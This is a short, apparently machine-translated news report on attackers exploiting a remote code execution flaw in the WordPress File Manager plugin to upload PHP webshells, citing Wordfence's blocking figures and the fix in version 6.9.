Hackers exploit a critical remote code execution bug in the WordPress File Manager plugin with the goal of uploading scripts and execute arbitrarily code in WordPress sites that run vulnerable versions of the plugin. The File Manager plugin, which allows users to easily manage archives directly from WordPress, is installed on more than 700.000 WordPress sites.
The bug was discovered by Gonzalo Cruz, an Arsys researcher, who confirmed that hackers have already started exploiting it to upload malicious PHP files to vulnerable sites. This bug affects all publications between 6.0 and 6.8 of the popular plugin. The developers of the plugin fixed it immediately, with the release of version 6.9.
In particular, Wordfence stated that firewall has blocked more than 450.000 attempts exploitation this bug in recent days, noticing that hackers are trying to enter random files, which seem to start with the word "Hard" or "x". From the firewall data regarding the attack, it was found that the intruders may be checking the bug with empty files, while they may even attempt to import malicious files. The following is a list of some of the uploaded files:
- x.php ”
Wordfence experts confirm that hackers are trying to upload PHP files by hiding webshells within images in wp-content / plugins / wp-file-manager / lib / files / folder. Thus, they recommend the immediate update of the File Manager plugin with the latest version, 6.9.
The plugin has been downloaded more than 126.000 times in the last two days, which means that at least 574.000 WordPress sites may be exposed to hackers. Finally, it is worth noting that 51,5%, ie over 300.000, of sites that use the File Manager plugin, run a vulnerable version.